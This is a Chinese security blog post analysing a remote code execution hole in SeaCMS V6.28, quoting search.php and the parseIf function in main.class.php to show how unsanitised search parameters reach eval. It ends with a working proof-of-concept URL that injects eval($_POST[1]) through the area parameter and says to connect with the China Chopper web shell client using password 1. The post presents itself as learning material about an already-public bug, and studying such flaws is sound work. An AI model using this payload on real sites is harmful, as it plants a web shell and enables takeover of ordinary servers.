欢迎光临
我们一直在努力

海洋CMS V6.28代码执行0day

海洋CMS 版本 6.28 代码执行漏洞,很早之前挖的,网上已经被曝了,发出来当学习把
漏洞文件:seacms/search.php

function echoSearchPage() {     global $dsql,$cfg_iscache,$mainClassObj,$page,$t1,$cfg_search_time,$searchtype,$searchword,$tid,$year,$letter,$area,$yuyan,$state,$ver,$order,$jq,$money,$cfg_basehost;     $order = !empty($order)?$order:time;     if(intval($searchtype)==5)     {         $searchTemplatePath = "/templets/".$GLOBALS['cfg_df_style']."/".$GLOBALS['cfg_df_html']."/cascade.html";         $typeStr = !empty($tid)?intval($tid).'_':'0_';         $yearStr = !empty($year)?PinYin($year).'_':'0_';         $letterStr = !empty($letter)?$letter.'_':'0_';         $areaStr = !empty($area)?PinYin($area).'_':'0_';         $orderStr = !empty($order)?$order.'_':'0_';         $jqStr = !empty($jq)?$jq.'_':'0_';         $cacheName="parse_cascade_".$typeStr.$yearStr.$letterStr.$areaStr.$orderStr;         $pSize = getPageSizeOnCache($searchTemplatePath,"cascade","");     }else     {         if($cfg_search_time&&$page==1) checkSearchTimes($cfg_search_time);         $searchTemplatePath = "/templets/".$GLOBALS['cfg_df_style']."/".$GLOBALS['cfg_df_html']."/search.html";         $cacheName="parse_search_";         $pSize = getPageSizeOnCache($searchTemplatePath,"search","");     }     if (empty($pSize)) $pSize=12;     switch (intval($searchtype)) {         case -1:             $whereStr=" where v_recycled=0 and (v_name like '%$searchword%' or v_actor like '%$searchword%' or v_director like '%$searchword%' or v_publisharea like '%$searchword%'  or v_publishyear like '%$searchword%' or v_letter='$searchword' or v_tags='$searchword' or v_nickname like '%$searchword%')";         break;         case 0:             $whereStr=" where v_recycled=0 and v_name like '%$searchword%'";             break;         case 1:             $whereStr=" where v_recycled=0 and v_actor like '%$searchword%'";         break;         case 2:             $whereStr=" where v_recycled=0 and v_publisharea like '%$searchword%'";         break;         case 3:             $whereStr=" where v_recycled=0 and v_publishyear like '%$searchword%'";         break;         case 4:             $whereStr=" where v_recycled=0 and v_letter='".strtoupper($searchword)."'";         break;         case 5:             $whereStr=" where v_recycled=0";             if(!empty($tid)) $whereStr.=" and (tid in (".getTypeId($tid).") or FIND_IN_SET('".$tid."',v_extratype)<>0)";             if($year=="more")                 {                 $publishyeartxt=sea_DATA."/admin/publishyear.txt";                         $publishyear = array();                         if(filesize($publishyeartxt)>0)                         {                             $publishyear = file($publishyeartxt);                         }                         $yearArray=$publishyear;                         $yeartxt= implode(',',$yearArray);                         $whereStr.=" and v_publishyear not in ($yeartxt)";                 }             if(!empty($year) AND $year!="more")                 {$whereStr.=" and v_publishyear='$year'";}             if($letter=="0-9")                 {$whereStr.=" and v_letter in ('0','1','2','3','4','5','6','7','8','9')";}             if(!empty($letter) AND $letter!="0-9")                 {$whereStr.=" and v_letter='$letter'";}             if(!empty($area)) $whereStr.=" and v_publisharea='$area'";             if(!empty($yuyan)) $whereStr.=" and v_lang='$yuyan'";             if(!empty($jq)) $whereStr.=" and v_jq like'%$jq%'";             if($state=='l') $whereStr.=" and v_state !=0";             if($state=='w') $whereStr.=" and v_state=0";             if($money=='s') $whereStr.=" and v_money !=0";             if($money=='m') $whereStr.=" and v_money=0";             if(!empty($ver)) $whereStr.=" and v_ver='$ver'";         break;     }     $sql="select count(*) as dd from sea_data ".$whereStr;     $row = $dsql->GetOne($sql);     if(is_array($row))     {         $TotalResult = $row['dd'];     }     else     {         $TotalResult = 0;     }     $pCount = ceil($TotalResult/$pSize);     if($cfg_iscache){         if(chkFileCache($cacheName)){             $content = getFileCache($cacheName);         }else{             $content = parseSearchPart($searchTemplatePath);             setFileCache($cacheName,$content);         }     }else{             $content = parseSearchPart($searchTemplatePath);     }     $content = str_replace("{searchpage:page}",$page,$content);     $content = str_replace("{seacms:searchword}",$searchword,$content);     $content = str_replace("{seacms:searchnum}",$TotalResult,$content);     $content = str_replace("{searchpage:ordername}",$order,$content);          $content = str_replace("{searchpage:order-hit-link}",$cfg_basehost."/search.php?page=".$page."&searchtype=5&order=hit&tid=".$tid."&area=".$area."&year=".$year."&letter=".$letter."&yuyan=".$yuyan."&state=".$state."&money=".$money."&ver=".$ver."&jq=".$jq,$content);     $content = str_replace("{searchpage:order-hitasc-link}",$cfg_basehost."/search.php?page=".$page."&searchtype=5&order=hitasc&tid=".$tid."&area=".$area."&year=".$year."&letter=".$letter."&yuyan=".$yuyan."&state=".$state."&money=".$money."&ver=".$ver."&jq=".$jq,$content);          $content = str_replace("{searchpage:order-id-link}",$cfg_basehost."/search.php?page=".$page."&searchtype=5&order=id&tid=".$tid."&area=".$area."&year=".$year."&letter=".$letter."&yuyan=".$yuyan."&state=".$state."&money=".$money."&ver=".$ver."&jq=".$jq,$content);     $content = str_replace("{searchpage:order-idasc-link}",$cfg_basehost."/search.php?page=".$page."&searchtype=5&order=idasc&tid=".$tid."&area=".$area."&year=".$year."&letter=".$letter."&yuyan=".$yuyan."&state=".$state."&money=".$money."&ver=".$ver."&jq=".$jq,$content);          $content = str_replace("{searchpage:order-time-link}",$cfg_basehost."/search.php?page=".$page."&searchtype=5&order=time&tid=".$tid."&area=".$area."&year=".$year."&letter=".$letter."&yuyan=".$yuyan."&state=".$state."&money=".$money."&ver=".$ver."&jq=".$jq,$content);     $content = str_replace("{searchpage:order-timeasc-link}",$cfg_basehost."/search.php?page=".$page."&searchtype=5&order=timeasc&tid=".$tid."&area=".$area."&year=".$year."&letter=".$letter."&yuyan=".$yuyan."&state=".$state."&money=".$money."&ver=".$ver."&jq=".$jq,$content);          $content = str_replace("{searchpage:order-commend-link}",$cfg_basehost."/search.php?page=".$page."&searchtype=5&order=commend&tid=".$tid."&area=".$area."&year=".$year."&letter=".$letter."&yuyan=".$yuyan."&state=".$state."&money=".$money."&ver=".$ver."&jq=".$jq,$content);     $content = str_replace("{searchpage:order-commendasc-link}",$cfg_basehost."/search.php?page=".$page."&searchtype=5&order=commendasc&tid=".$tid."&area=".$area."&year=".$year."&letter=".$letter."&yuyan=".$yuyan."&state=".$state."&money=".$money."&ver=".$ver."&jq=".$jq,$content);          $content = str_replace("{searchpage:order-score-link}",$cfg_basehost."/search.php?page=".$page."&searchtype=5&order=score&tid=".$tid."&area=".$area."&year=".$year."&letter=".$letter."&yuyan=".$yuyan."&state=".$state."&money=".$money."&ver=".$ver."&jq=".$jq,$content);     $content = str_replace("{searchpage:order-scoreasc-link}",$cfg_basehost."/search.php?page=".$page."&searchtype=5&order=scoreasc&tid=".$tid."&area=".$area."&year=".$year."&letter=".$letter."&yuyan=".$yuyan."&state=".$state."&money=".$money."&ver=".$ver."&jq=".$jq,$content);     if(intval($searchtype)==5)     {         $tname = !empty($tid)?getTypeNameOnCache($tid):'全部';         $jq = !empty($jq)?$jq:'全部';         $area = !empty($area)?$area:'全部';         $year = !empty($year)?$year:'全部';         $yuyan = !empty($yuyan)?$yuyan:'全部';         $letter = !empty($letter)?$letter:'全部';         $state = !empty($state)?$state:'全部';         $ver = !empty($ver)?$ver:'全部';         $money = !empty($money)?$money:'全部';         $content = str_replace("{searchpage:type}",$tid,$content);         $content = str_replace("{searchpage:typename}",$tname ,$content);         $content = str_replace("{searchpage:year}",$year,$content);         $content = str_replace("{searchpage:area}",$area,$content);         $content = str_replace("{searchpage:letter}",$letter,$content);         $content = str_replace("{searchpage:lang}",$yuyan,$content);         $content = str_replace("{searchpage:jq}",$jq,$content);         if($state=='w'){$state2="完结";}elseif($state=='l'){$state2="连载中";}else{$state2="全部";}         if($money=='m'){$money2="免费";}elseif($money=='s'){$money2="收费";}else{$money2="全部";}         $content = str_replace("{searchpage:state}",$state2,$content);         $content = str_replace("{searchpage:money}",$money2,$content);         $content = str_replace("{searchpage:ver}",$ver,$content);         $content=$mainClassObj->parsePageList($content,"",$page,$pCount,$TotalResult,"cascade");         $content=$mainClassObj->parseSearchItemList($content,"type");         $content=$mainClassObj->parseSearchItemList($content,"year");         $content=$mainClassObj->parseSearchItemList($content,"area");         $content=$mainClassObj->parseSearchItemList($content,"letter");         $content=$mainClassObj->parseSearchItemList($content,"lang");         $content=$mainClassObj->parseSearchItemList($content,"jq");         $content=$mainClassObj->parseSearchItemList($content,"state");         $content=$mainClassObj->parseSearchItemList($content,"ver");         $content=$mainClassObj->parseSearchItemList($content,"money");     }else     {         $content=$mainClassObj->parsePageList($content,"",$page,$pCount,$TotalResult,"search");     }     $content=replaceCurrentTypeId($content,-444);     $content=$mainClassObj->parseIf($content);  //这个函数引起的,我们来跟踪下这个函数     $content=str_replace("{seacms:member}",front_member(),$content);     $searchPageStr = $content;     echo str_replace("{seacms:runinfo}",getRunTime($t1),$searchPageStr) ; }

parseif函数路径:/include/main.class.php

function parseIf($content){         if (strpos($content,'{if:')=== false){         return $content;         }else{         $labelRule = buildregx("{if:(.*?)}(.*?){end if}","is");         $labelRule2="{elseif";         $labelRule3="{else}";         preg_match_all($labelRule,$content,$iar);         $arlen=count($iar[0]);         $elseIfFlag=false;         for($m=0;$m<$arlen;$m++){             $strIf=$iar[1][$m];             $strIf=$this->parseStrIf($strIf);             $strThen=$iar[2][$m];             $strThen=$this->parseSubIf($strThen);             if (strpos($strThen,$labelRule2)===false){                 if (strpos($strThen,$labelRule3)>=0){                     $elsearray=explode($labelRule3,$strThen);                     $strThen1=$elsearray[0];                     $strElse1=$elsearray[1];                     @eval("if(".$strIf."){/$ifFlag=true;}else{/$ifFlag=false;}");                     if ($ifFlag){ $content=str_replace($iar[0][$m],$strThen1,$content);} else {$content=str_replace($iar[0][$m],$strElse1,$content);}                 }else{                     @eval("if(".$strIf.") { /$ifFlag=true;} else{ /$ifFlag=false;}");//就是这里了,@eval                 if ($ifFlag) $content=str_replace($iar[0][$m],$strThen,$content); else $content=str_replace($iar[0][$m],"",$content);}             }else{                 $elseIfArray=explode($labelRule2,$strThen);                 $elseIfArrayLen=count($elseIfArray);                 $elseIfSubArray=explode($labelRule3,$elseIfArray[$elseIfArrayLen-1]);                 $resultStr=$elseIfSubArray[1];                 $elseIfArraystr0=addslashes($elseIfArray[0]);                 @eval("if($strIf){/$resultStr=/"$elseIfArraystr0/";}");                 for($elseIfLen=1;$elseIfLen<$elseIfArrayLen;$elseIfLen++){                     $strElseIf=getSubStrByFromAndEnd($elseIfArray[$elseIfLen],":","}","");                     $strElseIf=$this->parseStrIf($strElseIf);                     $strElseIfThen=addslashes(getSubStrByFromAndEnd($elseIfArray[$elseIfLen],"}","","start"));                     @eval("if(".$strElseIf."){/$resultStr=/"$strElseIfThen/";}");                     @eval("if(".$strElseIf."){/$elseIfFlag=true;}else{/$elseIfFlag=false;}");                     if ($elseIfFlag) {break;}                 }                 $strElseIf0=getSubStrByFromAndEnd($elseIfSubArray[0],":","}","");                 $strElseIfThen0=addslashes(getSubStrByFromAndEnd($elseIfSubArray[0],"}","","start"));                 if(strpos($strElseIf0,'==')===false&&strpos($strElseIf0,'=')>0)$strElseIf0=str_replace('=', '==', $strElseIf0);                 @eval("if(".$strElseIf0."){/$resultStr=/"$strElseIfThen0/";/$elseIfFlag=true;}");                 $content=str_replace($iar[0][$m],$resultStr,$content);             }         }         return $content;         }
POC:/search.php?searchtype=5&tid=&area=eval($_POST[1]) 菜刀链接,密码为1

未经允许不得转载:杂术馆 » 海洋CMS V6.28代码执行0day
分享到: 更多 (0)